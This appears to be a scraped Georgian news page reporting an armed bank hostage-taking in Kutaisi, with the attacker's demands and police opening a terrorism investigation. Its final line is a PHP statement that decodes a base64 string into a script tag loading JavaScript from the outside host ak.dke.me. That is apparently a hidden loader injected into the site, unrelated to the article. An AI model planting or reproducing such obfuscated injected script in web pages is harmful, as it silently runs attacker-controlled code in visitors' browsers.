celsiusi
ავერსი შნაიდერი
​​ქუთაისში პირი, რომელიც ბანკში შეიჭრა, "სპრინტერის" ფირმის მანქანას, 2 მილიონ დოლარს, ვერტმფრენს, რუსულ დროშასა და ანკესს ითხოვს. 
 
ვიდეო ერთ-ერთმა მძევალმა სოციალურ ქსელში გაავრცელა. ვიდეოში ისმის მძევლების საუბარი, ერთ-ერთი მათგანი ამბობს, რომ ასაფეთქებელ მოწყობილობაზე წამზომია ჩართული.
 
ქუთაისში რუსთაველის გამზირზე ბანკზე თავდასხმა დღის 11:00 საათზე მოხდა. უწყების ინფორმაციით, თავდამსხმელს 12 პირი ჰყავს მძევლად აყვანილი. არსებული ინფორმაციით, მძევლებს შორის ორი ბანკის თანამშრომელია, დანარჩენი კი მომხმარებელი. 
 
ადგილზე მობილიზებული არიან სამართალდამცველები გამოძიება დაწყებულია  ტერორისტული აქტის, ტერორისტული მიზნით მძევლად ხელში ჩაგდების და საბრძოლო მასალის მართლსაწინააღმდეგო შეძენა-შენახვა-ტარების მუხლით.
445
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");